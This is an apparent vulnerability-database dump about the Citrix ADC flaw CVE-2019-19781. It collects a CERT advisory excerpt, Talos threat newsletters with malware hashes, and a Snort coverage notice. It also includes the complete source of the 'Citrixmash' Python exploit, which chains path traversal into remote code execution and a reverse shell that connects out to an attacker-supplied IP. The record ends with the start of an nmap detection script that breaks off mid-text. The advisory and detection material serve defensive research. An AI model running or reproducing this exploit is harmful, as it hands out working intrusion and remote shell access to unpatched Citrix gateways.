<https://github.com/x1sec/x1sec.github.io/blob/master/CVE-2019-19781-DFIR.md>\n * <https://www.us-cert.gov/ncas/alerts/aa20-020a>\n * <https://www.us-cert.gov/ncas/alerts/aa20-031a>\n\n### Acknowledgements\n\nThis vulnerability was reported to the vendor by Mikhail Klyuchnikov of Positive Technologies.\n\nThis document was written by Art Manion and Will Dormann.\n\n### Other Information\n\n**CVE IDs:** | [CVE-2019-19781](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-19781>) \n---|--- \n**Date Public:** | 2019-12-17 \n**Date First Published:** | 2020-01-08 \n**Date Last Updated: ** | 2020-02-03 13:11 UTC \n**Document Revision: ** | 111 \n", "modified": "2020-02-03T13:11:00", "published": "2020-01-08T00:00:00", "id": "VU:619785", "href": "https://www.kb.cert.org/vuls/id/619785", "type": "cert", "title": "Citrix Application Delivery Controller, Citrix Gateway, and Citrix SD-WAN WANOP web server vulnerability", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "talosblog": [{"lastseen": "2020-01-30T19:31:49", "bulletinFamily": "blog", "description": "[](<http://4.bp.blogspot.com/-YLRBgfX54uk/XKYbVrHlGXI/AAAAAAAAFu8/MxjUEd-3hhQTW4tZkat-cLDi8G5tVm6bgCK4BGAYYCw/s1600/threat-source.png>) \n_Newsletter compiled by Jon Munshaw._ \n \nWelcome to this week\u2019s Threat Source newsletter \u2014 the perfect place to get caught up on all things Talos from the past week. \n \nBe sure to pay close attention Tuesday for [some changes we have coming to Snort.org](<https://blog.snort.org/2020/01/area-under-construction-snort.html>). We\u2019ll spare you the details for now, but please bear with us if the search function isn\u2019t working correctly for you or you see anything else wonky on the site. \n \nAnd, as always, we have the [latest Threat Roundup](<https://blog.talosintelligence.com/2020/01/threat-roundup-0117-0124.html>) where we go through the top threats we saw \u2014 and blocked \u2014 over the past week. \n\n\n### Upcoming public engagements\n\n**Event: **A World of Threats: When DNS becomes the new weapon for governments at [Swiss Cyber Security Days](<https://swisscybersecuritydays.ch/en/programme-en/>)** ** \n**Location: **Forum Fribourg, Granges-Paccot, Switzerland \n**Date: **Feb. 12 - 13 \n**Speakers: **Paul Rascagn\u00e8res \n**Synopsis: **In this presentation, Paul will present two threat actors Cisco Talos has been tracking who are manipulating the DNS system. On Jan. 22, 2019, the U.S. DHS published a directive concerning this attack vector. We will present the timeline for these events and their technical details. One of the actors is behind the campaign we named \u201cSea Turtle.\u201d This actor is more advanced and more aggressive than others we\u2019ve observed in the past. They do not hesitate to directly target registrars and one registry. The talk will break down these two actors and the methodology used to target the victims. \n \n\n\n### Cyber Security Week in Review\n\n * State-sponsored actors linked to Turkey are believed to be [behind a recent wave of cyber attacks](<https://www.reuters.com/article/us-cyber-attack-hijack-exclusive/exclusive-hackers-acting-in-turkeys-interests-believed-to-be-behind-recent-cyberattacks-sources-idUSKBN1ZQ10X>) targeting governments in the Middle East and Asia. The attackers are using a technique called DNS hijacking that shows similarities to the Sea Turtle actor Cisco Talos discovered last year. \n * Facebook executives backed the security of its WhatsApp messaging software, saying it [could not have been at fault](<https://www.inc.com/jason-aten/facebook-says-apple-is-to-blame-for-hacking-of-jeff-bezos-phone.html>) for the hacking of Amazon CEO Jeff Bezos\u2019 phone. Reports state Bezos was sent a malicious video through WhatsApp and opened it, leading to the installation of spyware. However, Facebook laid the blame at the feet of Apple and iOS\u2019 security. \n * The Bezos incident has led to many wealthy individuals reaching out to cyber security vendors for [private assistance with security](<https://www.ft.com/content/96c79040-40ea-11ea-bdb5-169ba7be433d>). For example, one group is working on an information-sharing platform for cyber attacks targeting members of royal families across the globe. \n * Dozens of United Nations servers and user accounts were [breached during an August cyber attack](<https://www.thenewhumanitarian.org/investigation/2020/01/29/united-nations-cyber-attack>), according to new leaked reports. Staff members working in the UN\u2019s Geneva, Switzerland office were reportedly told to change their passwords but were not made aware of the breach. \n * The Japanese government [adopted a series of new policies](<https://www.infosecurity-magazine.com/news/japan-considers-emergency/>) this week designed to protect government services from a cyber attack during the upcoming Summer Olympics. A special panel called on infrastructure and public transportation services to investigate any potential vulnerabilities in their systems due to the use of internet-of-things devices, and report those flaws immediately to an administrator. \n * Cisco [launched a new security architecture platform for IoT devices](<https://securityboulevard.com/2020/01/cisco-launches-iot-security-platform/>) this week. Cisco Cyber Vision provides users with software and services backed by Talos\u2019 intelligence to identify threats and vulnerabilities in IoT assets in real-time. \n * Facebook [agreed to pay $550 million](<https://techcrunch.com/2020/01/29/facebook-will-pay-550-million-to-settle-class-action-lawsuit-over-privacy-violations/>) as part of a settlement of a class-action lawsuit in Illinois. The suit alleged Facebook violated a state law by using facial recognition technology to auto-tag users in photos without obtaining their consent. \n * The actor behind the Maze ransomware [dumped a large amount of victim data online](<https://arstechnica.com/information-technology/2020/01/dozens-of-companies-have-data-dumped-online-by-ransomware-ring-seeking-leverage/>) this week, including information from an Ohio community college and a grocery store chain in Michigan. Administrators of Maze\u2019s website said in a message that they were sparing recent victim Parkland, Florida, but still leaked some data to prove that they were hacked. \n * The [latest security update to iOS](<https://threatpost.com/apple-patches-ios-device-tracking/152364/>) allows users to disable a location-tracking feature used by many apps. The latest patches also fixed a critical remote code execution vulnerability in the WebKit browsing engine. \n\n \n\n\n### Notable recent security issues\n\n**Title: **[Cisco urging users to update Firepower Management Center immediately to fix severe bug](<https://www.zdnet.com/article/cisco-patch-this-critical-firewall-bug-in-firepower-management-center/>) \n**Description: **Cisco disclosed a high-severity vulnerability in its Firepower Management Center last week that could allow an attacker to bypass the usual authentication steps. The vulnerability \u2014 which was assigned a 9.8 severity score out of 10 \u2014 exists in the way Firepower handles LDAP authentication responses from an external authentication server. An attacker could exploit this flaw by sending a specially crafted HTTP request to the device. Users are also encouraged to turn off LDAP configuration on their devices. Cisco also disclosed seven high-severity flaws and 19 medium-severity security issues in some of its other products, including Smart Software Manager. \n**Snort SIDs: **52627 \u2013 52632, 52641 - 52646 \n** \n****Title: **[Exploitation of Citrix vulnerability spikes after POC released, patches followed](<https://threatpost.com/citrix-patch-rollout-critical-rce-flaw/152041/>) \n**Description: **Citrix rushed out a patch for its Application Delivery Controller (ADC) and Citrix Gateway products after proof of concept code leaked for a major vulnerability. The company first disclosed CVE-2019-19781 in December, saying a patch was forthcoming. But security researchers have noticed an uptick in exploitation attacks, forcing Citrix to move up its timeline. \n**Snort SIDs: **52620 \n\n\n### Most prevalent malware files this week\n\n**SHA 256:** [85b936960fbe5100c170b777e1647ce9f0f01e3ab9742dfc23f37cb0825b30b5](<https://www.virustotal.com/gui/file/85b936960fbe5100c170b777e1647ce9f0f01e3ab9742dfc23f37cb0825b30b5/details>) \n**MD5: **8c80dd97c37525927c1e549cb59bcbf3 \n**Typical Filename:** eternalblue-2.2.0.exe \n**Claimed Product: **N/A \n**Detection Name: **W32.85B936960F.5A5226262.auto.Talos \n \n**SHA 256: **[3f6e3d8741da950451668c8333a4958330e96245be1d592fcaa485f4ee4eadb3](<https://www.virustotal.com/gui/file/3f6e3d8741da950451668c8333a4958330e96245be1d592fcaa485f4ee4eadb3/details>) \n**MD5: **47b97de62ae8b2b927542aa5d7f3c858 \n**Typical Filename: **qmreportupload.exe \n**Claimed Product:** qmreportupload \n**Detection Name: **Win.Trojan.Generic::in10.talos \n \n**SHA 256: **[c0cdd2a671195915d9ffb5c9533337db935e0cc2f4d7563864ea75c21ead3f94** **](<https://www.virustotal.com/gui/file/c0cdd2a671195915d9ffb5c9533337db935e0cc2f4d7563864ea75c21ead3f94/details>) \n**MD5: **7c38a43d2ed9af80932749f6e80fea6f \n**Typical Filename: **xme64-520.exe \n**Claimed Product: **N/A** ** \n**Detection Name: **PUA.Win.File.Coinminer::1201 \n \n**SHA 256: **[c3e530cc005583b47322b6649ddc0dab1b64bcf22b124a492606763c52fb048f](<https://www.virustotal.com/gui/file/c3e530cc005583b47322b6649ddc0dab1b64bcf22b124a492606763c52fb048f/details>) \n**MD5:** e2ea315d9a83e7577053f52c974f6a5a \n**Typical Filename: **c3e530cc005583b47322b6649ddc0dab1b64bcf22b124a492606763c52fb048f \n**Claimed Product: **N/A \n**Detection Name:** W32.AgentWDCR:Gen.21gn.1201 \n** \n****SHA 256: **[d91abcd024d4172fadc5aa82750a18796a549207b76f624b8a9d165459379258](<https://www.virustotal.com/gui/file/d91abcd024d4172fadc5aa82750a18796a549207b76f624b8a9d165459379258/details>)** ** \n**MD5:** a917d39a8ef125300f2f38ff1d1ab0db \n**Typical Filename: **FFChromeSetters \n**Claimed Product: **N/A \n**Detection Name: **PUA.Osx.Adware.Macsearch::agent.tht.talos \n \nKeep up with all things Talos by following us on [Twitter](<https://twitter.com/talossecurity?lang=en>). [Snort](<https://twitter.com/snort?ref_src=twsrc%5Egoogle%7Ctwcamp%5Eserp%7Ctwgr%5Eauthor>), [ClamAV](<https://twitter.com/clamav?ref_src=twsrc%5Egoogle%7Ctwcamp%5Eserp%7Ctwgr%5Eauthor>) and [Immunet](<https://twitter.com/immunet?lang=en>) also have their own accounts you can follow to keep up with their latest updates. You can also subscribe to the Beers with Talos podcast [here](<https://itunes.apple.com/us/podcast/beers-with-talos-podcast/id1236329410>) (as well as on your favorite podcast app). And, if you\u2019re not already, you can also subscribe to the weekly Threat Source newsletter [here](<https://engage2demand.cisco.com/SubscribeTalosThreatSource>). \n\n", "modified": "2020-01-30T11:00:12", "published": "2020-01-30T11:00:12", "id": "TALOSBLOG:7192A351B37E9A67C1A5DB760A14DA7E", "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/VpsmXEgBYno/threat-source-newsletter-jan-30-2020.html", "type": "talosblog", "title": "Threat Source newsletter (Jan. 30, 2020)", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-01-15T21:25:49", "bulletinFamily": "blog", "description": "[](<https://1.bp.blogspot.com/-VTnYmwu8m3c/Xhy-eerp0iI/AAAAAAAABag/IaZw8HUa2sMUAmJgZvkCC7JrtedOpg9AACLcBGAsYHQ/s1600/image1.png>)\n\n_By [Edmund Brumaghin](<https://www.blogger.com/profile/10442669663667294759>), with contributions from Dalton Schaadt. _ \n \n\n\n## Executive Summary\n\n \nRecently, the details of a critical vulnerability affecting Citrix Application Delivery Controller and Citrix Gateway servers were publicly disclosed. This vulnerability is currently being tracked using [CVE-2019-19781](<https://nvd.nist.gov/vuln/detail/CVE-2019-19781>). A public patch has not yet been released, however, Citrix has [released](<https://support.citrix.com/article/CTX267679>) recommendations for steps that affected organizations can take to help mitigate the risk associated with this vulnerability. Successful exploitation of CVE-2019-19781 could allow a remote attacker to execute arbitrary code on affected systems. \n \nThis vulnerability, which is a directory traversal vulnerability, affects multiple [versions](<https://support.citrix.com/article/CTX267027>) of these products. Since the public disclosure of this vulnerability, several proof-of-concept (PoC) tools have been publicly released that can be used by adversaries to scan for vulnerable systems and attempt to exploit the vulnerable condition to achieve remote code execution. There have been multiple public reports of mass-scanning and exploitation activity already being observed in the wild. As such, it is important that organizations are aware of this vulnerability and take steps to ensure that they mitigate the risk of attacks against their environment. \n \n\n\n## Talos coverage for CVE-2019-19781\n\n \nTalos has developed and released coverage for this vulnerability in the form of [Snort](<https://www.snort.org/products>) and [Firepower](<https://www.cisco.com/c/en/us/products/security/firepower-management-center/index.html>) signatures. These signatures have been available since Dec. 24, 2019 and can be leveraged by organizations to protect their affected systems from possible exploitation attempts until an official patch is publicly released. \n \n**Snort SIDs:** 52512, 52513, 52603 \n \n", "modified": "2020-01-15T11:41:36", "published": "2020-01-15T11:41:36", "id": "TALOSBLOG:D7662F18F14544FB63C58CB527CC3A4A", "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/uCR7T0fZRUs/snort-rules-cve-2019-19781.html", "type": "talosblog", "title": "New Snort rules protect against recently discovered Citrix vulnerability", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-01-23T17:32:42", "bulletinFamily": "blog", "description": "[](<http://4.bp.blogspot.com/-YLRBgfX54uk/XKYbVrHlGXI/AAAAAAAAFu8/MxjUEd-3hhQTW4tZkat-cLDi8G5tVm6bgCK4BGAYYCw/s1600/threat-source.png>) \n_Newsletter compiled by Jon Munshaw._ \n \nWelcome to this week\u2019s Threat Source newsletter \u2014 the perfect place to get caught up on all things Talos from the past week. \n \nThis wasn\u2019t your average Patch Tuesday. Microsoft\u2019s monthly security update was notable for a few reasons. For starters, it\u2019s really time to give up Windows 7, since this is the last free update Microsoft will issue for the operating system. \n \nThere was also a vulnerability that made headlines for leaving Windows open to cryptographic spoofing, which could allow an attacker to sign a malicious file as if it came from a trusted source. The bug was so severe that Microsoft even reached out to the U.S. military ahead of time to issue them an early patch. For more on Patch Tuesday, you can check out our roundup [here](<https://blog.talosintelligence.com/2020/01/microsoft-patch-tuesday-jan-2020.html>) and our Snort rule release [here](<https://blog.snort.org/2020/01/snort-rule-update-for-jan-14-2020.html>). \n \nElsewhere in the vulnerability department, we also released new Snort rules to [protect users against some notable Citrix bugs](<https://blog.talosintelligence.com/2020/01/snort-rules-cve-2019-19781.html>) that have been used in the wild. \n \nAnd, as always, we have the [latest Threat Roundup](<https://blog.talosintelligence.com/2020/01/threat-roundup-0103-0110.html>) where we go through the top threats we saw \u2014 and blocked \u2014 over the past week. \n\n\n### Upcoming public engagements\n\n**Event: **Talos Insights: The State of Cyber Security at Cisco Live Barcelona \n**Location: **Fira Barcelona, Barcelona, Spain \n**Date:** Jan. 27 - 31 \n**Speakers: **Warren Mercer \n**Synopsis: **Cisco Talos specializes in early-warning intelligence and threat analysis necessary for maintaining a secure network. We are responsible for defending networks realize that the security threat landscape is constantly in flux as attackers evolve their skills. Talos advances the overall efficacy of all Cisco security platforms by aggregating data, cooperating with teams of security experts, and applying the cutting-edge big data technology to security. In this talk, we will perform a deep analysis of recent threats and see how Talos leverages large datasets to deliver product improvements and mitigation strategies. \n \n\n\n### Cyber Security Week in Review\n\n * Apple once again [denied the FBI\u2019s request](<https://threatpost.com/apple-denies-fbi-request-to-unlock-shooters-iphone-again/151797/>) for the company to unlock an iPhone belonging to someone involved in a criminal investigation. The agency is attempting to access a device belonging to a man who shot and killed multiple people at a naval base last year. \n * This caused U.S. President Donald Trump to enter the fold. [Trump tweeted](<https://www.bbc.com/news/business-51115645>) that he was unhappy with Apple denying law enforcement access to devices \"used by killers, drug dealers and other violent criminal elements.\u201d \n * More than two weeks after a ransomware attack, foreign currency exchange service Travelex is [finally resuming normal operations](<https://www.zdnet.com/article/two-weeks-after-ransomware-attack-travelex-says-some-systems-are-now-back-online/>). The company recently said it was making \u201cgood progress\u201d on recovery and was expecting customer-facing systems to return soon. \n * The Travelex attack [prompted the U.S. government to release a new warning](<https://www.forbes.com/sites/daveywinder/2020/01/13/us-government-critical-security-alert-upgrade-vpn-or-expect-continued-cyber-attacks/#182cb2f16f70>) that users need to update their VPN services as soon as possible. Vulnerabilities disclosed last year in Pulse Secure VPN leave users open to cyber attacks similar to the ransomware infection on Travelex, according to the U.S. Cybersecurity and Infrastructure Security Agency. \n * The Democratic party in Iowa says it will still use a mobile app to [report primary election results](<https://www.npr.org/2020/01/14/795906732/despite-election-security-fears-iowa-caucuses-will-use-new-smartphone-app>), despite warnings that it is a security risk. Election judges will use the apps to count polling results during the presidential primaries and report those results on their mobile devices, though officials say there will be paper backups to verify the results. \n * The estimated cost of a recent cyber attack on the city of New Orleans is [above $7 million](<https://www.fox8live.com/2020/01/15/city-new-orleans-says-it-will-take-months-recover-recent-cyber-attack/>), $3 million of which the city says it will recoup from its cyber insurance policy. Officials say it will still take months to rebuild their internal network, and departments are still digging out from having to manually carry out many functions for weeks. \n * The U.S. election security czar warned that attempts to interfere in the U.S.\u2019 upcoming presidential election will be [more sophisticated than ever](<https://www.nbcnews.com/politics/national-security/u-s-election-czar-says-attempts-hack-2020-election-will-n1115346>). Shelby Pierson said at a recent presentation America is tracking several hacking groups, including a recent effort uncovered to breach a Ukrainian company at the center of President Donald Trump\u2019s impeachment trial. \n * A critical [vulnerability in a popular WordPress plugin](<https://www.bleepingcomputer.com/news/security/critical-wordpress-plugin-bug-allows-admin-logins-without-password/>) leaves more than 300,000 sites open to attack. An attacker could exploit a bug in InfiniteWP to log in as an administrator on any affected site. \n * Android devices infected with the Faketoken malware began [sending offensive SMS messages](<https://www.kaspersky.com/blog/faketoken-trojan-sends-offensive-sms/32048/>) last week. It sends these messages to foreign numbers, potentially costing the victim money based on their carrier\u2019s policies. \n * The U.S. may invest more than $1 billion into [researching alternatives for 5G](<https://arstechnica.com/tech-policy/2020/01/us-may-subsidize-huawei-alternatives-with-proposed-1-25-billion-fund/>) to avoid working with Chinese tech companies Huawei and ZTE. Legislation submitted in the Senate urged America to counter the Chinese government\u2019s investment in the telecom space.\n\n### Notable recent security issues\n\n**Title: **[Microsoft patches 49 vulnerabilities as part of Patch Tuesday](<https://www.pcworld.com/article/3514172/microsoft-nsa-confirm-killer-windows-10-bug-but-a-patch-is-available.html>) \n**Description: **Microsoft released its monthly security update today, disclosing vulnerabilities across many of its products and releasing corresponding updates. Patch Tuesday covers 49 vulnerabilities, eight of which are considered critical. This month's security update is particularly important for its disclosure of two vulnerabilities related to a core cryptographic component in all versions of Windows. CVE-2020-0601 could allow an attacker to use cryptography to sign a malicious executable, making the file appear as if it was from a trusted source. The victim would have no way of knowing if the file was malicious. Cyber security reporter Brian Krebs says the vulnerability is so serious, Microsoft secretly deployed a patch to branches of the U.S. military prior to today. \n**Snort SIDs: **52593 - 51596, 52604, 52605 \n \n**Title: **[ZeroCleare wiper malware deployed on oil refinery ](<https://www.zdnet.com/article/new-iranian-data-wiper-malware-hits-bapco-bahrains-national-oil-company/>) \n**Description: **ZeroCleare, a wiper malware connected to an Iranian hacker group, was recently deployed against a national oil refinery in Bahrain. An upgraded version has been spotted in the wild, according to security researchers, which can delete files off infected machines. The latest attacks match previous attacks using this malware family, which have gone after other targets connected to Saudi Arabia. Concerns over Iranian cyber attacks have spiked since the U.S. killed a high-profile Iranian general in a drone strike. \n**Snort SIDs: **52572 \u2013 52581 \n\n\n### Most prevalent malware files this week\n\n**SHA 256: **[1c3ed460a7f78a43bab0ae575056d00c629f35cf7e72443b4e874ede0f305871](<https://www.virustotal.com/gui/file/1c3ed460a7f78a43bab0ae575056d00c629f35cf7e72443b4e874ede0f305871/details>) \n**MD5: **c2406fc0fce67ae79e625013325e2a68 \n**Typical Filename: **SegurazoIC.exe \n**Claimed Product: **Digital Communications Inc. \n**Detection Name: **PUA.Win.Adware.Ursu::95.sbx.tg \n** \n****SHA 256: **[d73ea76f6f07f96b337335213418b58e3fbc7e4b519fec0ef3fbd19c1d335d81](<https://www.virustotal.com/gui/file/d73ea76f6f07f96b337335213418b58e3fbc7e4b519fec0ef3fbd19c1d335d81/details>)** ** \n**MD5: **5142c721e7182065b299951a54d4fe80 \n**Typical Filename: **FlashHelperServices.exe \n**Claimed Product: **Flash Helper Service \n**Detection Name: **PUA.Win.Adware.Flashserv::1201 \n \n**SHA 256:** [c3e530cc005583b47322b6649ddc0dab1b64bcf22b124a492606763c52fb048f](<https://www.virustotal.com/gui/file/c3e530cc005583b47322b6649ddc0dab1b64bcf22b124a492606763c52fb048f/details>)** ** \n**MD5: **e2ea315d9a83e7577053f52c974f6a5a \n**Typical Filename: **c3e530cc005583b47322b6649ddc0dab1b64bcf22b124a492606763c52fb048f.bin** ** \n**Claimed Product: **N/A \n**Detection Name: **W32.AgentWDCR:Gen.21gn.1201 \n** \n****SHA 256: **[15716598f456637a3be3d6c5ac91266142266a9910f6f3f85cfd193ec1d6ed8b](<https://www.virustotal.com/gui/file/15716598f456637a3be3d6c5ac91266142266a9910f6f3f85cfd193ec1d6ed8b/details>) \n**MD5: **799b30f47060ca05d80ece53866e01cc \n**Typical Filename: **mf2016341595.exe \n**Claimed Product: **N/A \n**Detection Name: **W32.Generic:Gen.22fz.1201 \n** \n****SHA 256: **[da231330efd623bc7d116ed233828be88951b9df7cc889e747d31279bdf2c2a0 ](<https://www.virustotal.com/gui/file/da231330efd623bc7d116ed233828be88951b9df7cc889e747d31279bdf2c2a0/details>) \n**MD5: **4a4ee4ce27fa4525be327967b8969e13 \n**Typical Filename: **4a4ee4ce27fa4525be327967b8969e13.exe \n**Claimed Product:** N/A \n**Detection Name: **PUA.Win.File.Coinminer::tpd \n \nKeep up with all things Talos by following us on [Twitter](<https://twitter.com/talossecurity?lang=en>). [Snort](<https://twitter.com/snort?ref_src=twsrc%5Egoogle%7Ctwcamp%5Eserp%7Ctwgr%5Eauthor>), [ClamAV](<https://twitter.com/clamav?ref_src=twsrc%5Egoogle%7Ctwcamp%5Eserp%7Ctwgr%5Eauthor>) and [Immunet](<https://twitter.com/immunet?lang=en>) also have their own accounts you can follow to keep up with their latest updates. You can also subscribe to the Beers with Talos podcast [here](<https://itunes.apple.com/us/podcast/beers-with-talos-podcast/id1236329410>) (as well as on your favorite podcast app). And, if you\u2019re not already, you can also subscribe to the weekly Threat Source newsletter [here](<https://engage2demand.cisco.com/SubscribeTalosThreatSource>). \n\n", "modified": "2020-01-23T07:27:43", "published": "2020-01-23T07:27:43", "id": "TALOSBLOG:C73CDA82B845335B5DCC8A94FB5662D8", "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/2OjR0NsavV0/threat-source-newsletter-jan-26-2019.html", "type": "talosblog", "title": "Threat Source newsletter (Jan. 16, 2019)", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "exploitpack": [{"lastseen": "2020-04-01T20:39:50", "bulletinFamily": "exploit", "description": "\nCitrix Application Delivery Controller and Citrix Gateway - Remote Code Execution", "modified": "2020-01-11T00:00:00", "published": "2020-01-11T00:00:00", "id": "EXPLOITPACK:959CB519C011AA90D2BEE4ED33D8FEBF", "href": "", "title": "Citrix Application Delivery Controller and Citrix Gateway - Remote Code Execution", "type": "exploitpack", "sourceData": "#!/usr/bin/python3\n#\n# Exploits the Citrix Directory Traversal Bug: CVE-2019-19781\n#\n# You only need a listener like netcat to catch the shell.\n#\n# Shout out to the team: Rob Simon, Justin Elze, Logan Sampson, Geoff Walton, Christopher Paschen, Kevin Haubris, Scott White\n#\n# Tool Written by: Rob Simon and David Kennedy\n\nimport requests\nimport urllib3\nurllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) # disable warnings\nimport random\nimport string\nimport time\nfrom random import randint\nimport argparse\nimport sys\n\n# random string generator\ndef randomString(stringLength=10):\n letters = string.ascii_lowercase\n return ''.join(random.choice(letters) for i in range(stringLength))\n\n# our random string for filename - will leave artifacts on system\nfilename = randomString()\nrandomuser = randomString()\n\n# generate random number for the nonce\nnonce = randint(5, 15) \n\n# this is our first stage which will write out the file through the Citrix traversal issue and the newbm.pl script\n# note that the file location will be in /netscaler/portal/templates/filename.xml\ndef stage1(filename, randomuser, nonce, victimip, victimport, attackerip, attackerport):\n\n # encoding our payload stub for one netcat listener - awesome work here Rob Simon (KC)\n encoded = \"\"\n i=0\n text = (\"\"\"python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"%s\",%s));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'\"\"\" % (attackerip, attackerport))\n while i < len(text):\n encoded = encoded + \"chr(\"+str(ord(text[i]))+\") . \"\n i += 1\n encoded = encoded[:-3]\n payload=\"[% template.new({'BLOCK'='print readpipe(\" + encoded + \")'})%]\"\n headers = ( \n {\n 'User-Agent' : 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:71.0) Gecko/20100101 Firefox/71.0',\n 'NSC_USER' : '../../../netscaler/portal/templates/%s' % (filename),\n 'NSC_NONCE' : '%s' % (nonce),\n })\n\n data = (\n {\n \"url\" : \"127.0.0.1\",\n \"title\" : payload,\n \"desc\" : \"desc\",\n \"UI_inuse\" : \"a\"\n })\n\n url = (\"https://%s:%s/vpn/../vpns/portal/scripts/newbm.pl\" % (victimip, victimport))\n requests.post(url, data=data, headers=headers, verify=False)\n\n# this is our second stage that triggers the exploit for us\ndef stage2(filename, randomuser, nonce, victimip, victimport):\n headers = (\n {\n 'User-Agent' : 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:71.0) Gecko/20100101 Firefox/71.0',\n 'NSC_USER' : '%s' % (randomuser),\n 'NSC_NONCE' : '%s' % (nonce),\n })\n\n requests.get(\"https://%s:%s/vpn/../vpns/portal/%s.xml\" % (victimip, victimport, filename), headers=headers, verify=False)\n\n\n# start our main code to execute\nprint('''\n\n .o oOOOOOOOo OOOo\n Ob.OOOOOOOo OOOo. oOOo. .adOOOOOOO\n OboO\"\"\"\"\"\"\"\"\"\"\"\".OOo. .oOOOOOo. OOOo.oOOOOOo..\"\"\"\"\"\"\"\"\"'OO\n OOP.oOOOOOOOOOOO \"POOOOOOOOOOOo. `\"OOOOOOOOOP,OOOOOOOOOOOB'\n `O'OOOO' `OOOOo\"OOOOOOOOOOO` .adOOOOOOOOO\"oOOO' `OOOOo\n .OOOO' `OOOOOOOOOOOOOOOOOOOOOOOOOO' `OO\n OOOOO '\"OOOOOOOOOOOOOOOO\"` oOO\n oOOOOOba. .adOOOOOOOOOOba .adOOOOo.\n oOOOOOOOOOOOOOba. .adOOOOOOOOOO@^OOOOOOOba. .adOOOOOOOOOOOO\n OOOOOOOOOOOOOOOOO.OOOOOOOOOOOOOO\"` '\"OOOOOOOOOOOOO.OOOOOOOOOOOOOO\n \"OOOO\" \"YOoOOOOMOIONODOO\"` . '\"OOROAOPOEOOOoOY\" \"OOO\"\n Y 'OOOOOOOOOOOOOO: .oOOo. :OOOOOOOOOOO?' :`\n : .oO%OOOOOOOOOOo.OOOOOO.oOOOOOOOOOOOO? .\n . oOOP\"%OOOOOOOOoOOOOOOO?oOOOOO?OOOO\"OOo\n '%o OOOO\"%OOOO%\"%OOOOO\"OOOOOO\"OOO':\n `$\" `OOOO' `O\"Y ' `OOOO' o .\n . . OP\" : o .\n :\n\nCitrixmash v0.1 - Exploits the Citrix Directory Traversal Bug: CVE-2019-19781\nTool Written by: Rob Simon and Dave Kennedy\nContributions: The TrustedSec Team \nWebsite: https://www.trustedsec.com\nINFO: https://www.trustedsec.com/blog/critical-exposure-in-citrix-adc-netscaler-unauthenticated-remote-code-execution/\n\nThis tool exploits a directory traversal bug within Citrix ADC (NetScalers) which calls a perl script that is used\nto append files in an XML format to the victim machine. This in turn allows for remote code execution.\n\nBe sure to cleanup these two file locations:\n /var/tmp/netscaler/portal/templates/\n /netscaler/portal/templates/\n\nUsage:\n\npython citrixmash.py <victimipaddress> <victimport> <attacker_listener> <attacker_port>\\n''')\n\n# parse our commands\nparser = argparse.ArgumentParser()\nparser.add_argument(\"target\", help=\"the vulnerable server with Citrix (defaults https)\")\nparser.add_argument(\"targetport\", help=\"the target server web port (normally on 443)\")\nparser.add_argument(\"attackerip\", help=\"the attackers reverse listener IP address\")\nparser.add_argument(\"attackerport\", help=\"the attackersa reverse listener port\")\nargs = parser.parse_args()\nprint(\"[*] Firing STAGE1 POST request to create the XML template exploit to disk...\")\nprint(\"[*] Saving filename as %s.xml on the victim machine...\" % (filename))\n# trigger our first post\nstage1(filename, randomuser, nonce, args.target, args.targetport, args.attackerip, args.attackerport)\nprint(\"[*] Sleeping for 2 seconds to ensure file is written before we call it...\")\ntime.sleep(2)\nprint(\"[*] Triggering GET request for the newly created file with a listener waiting...\")\nprint(\"[*] Shell should now be in your listener... enjoy. Keep this window open..\")\nprint(\"[!] Be sure to cleanup the two locations here (artifacts): /var/tmp/netscaler/portal/templates/, /netscaler/portal/templates/\")\n# trigger our second post\nstage2(filename, randomuser, nonce, args.target, args.targetport)", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-04-01T20:39:50", "bulletinFamily": "exploit", "description": "\nCitrix Application Delivery Controller (ADC) and Gateway 13.0 - Path Traversal", "modified": "2020-01-16T00:00:00", "published": "2020-01-16T00:00:00", "id": "EXPLOITPACK:213FB88DED3CCAB77D32289A335E386D", "href": "", "title": "Citrix Application Delivery Controller (ADC) and Gateway 13.0 - Path Traversal", "type": "exploitpack", "sourceData": "# Exploit Title: Citrix Application Delivery Controller (ADC) and Gateway 13.0 - Path Traversal\n# Date: 2019-12-17\n# CVE: CVE-2019-19781\n# Vulenrability: Path Traversal\n# Vulnerablity Discovery: Mikhail Klyuchnikov\n# Exploit Author: Dhiraj Mishra\n# Vulnerable Version: 10.5, 11.1, 12.0, 12.1, and 13.0\n# Vendor Homepage: https://www.citrix.com/\n# References: https://support.citrix.com/article/CTX267027\n# https://github.com/nmap/nmap/pull/1893\n\nlocal http = require \"http\"\nlocal stdnse = require \"stdnse\"\nlocal shortport = require \"shortport\"\nlocal table = require \"table\"\nlocal string = require \"string\"\nlocal vulns = require \"vulns\"\nlocal nmap = require \"nmap\"\nlocal io = require \"io\"\n\ndescription = [[\nThis NSE script checks whether the traget server is vulnerable to\nCVE-2019-19781\n]]\n---\n-- @usage\n-- nmap --script https-citrix-path-traversal -p <port> <host>\n-- nmap --script https-citrix-path-traversal -p <port> <host> --script-args\noutput='file.txt'\n-- @output\n-- PORT STATE SERVICE\n-- 443/tcp open http\n-- | CVE-2019-19781:\n-- | Host is vulnerable to CVE-2019-19781\n-- @changelog\n-- 16-01-2020 - Author: Dhiraj Mishra (@RandomDhiraj)\n-- 17-12-2019 - Discovery: Mikhail Klyuchnikov (@__Mn1__)\n-- @xmloutput\n-- <table key=\"NMAP-1\">\n-- <elem key=\"title\">Citrix ADC Path 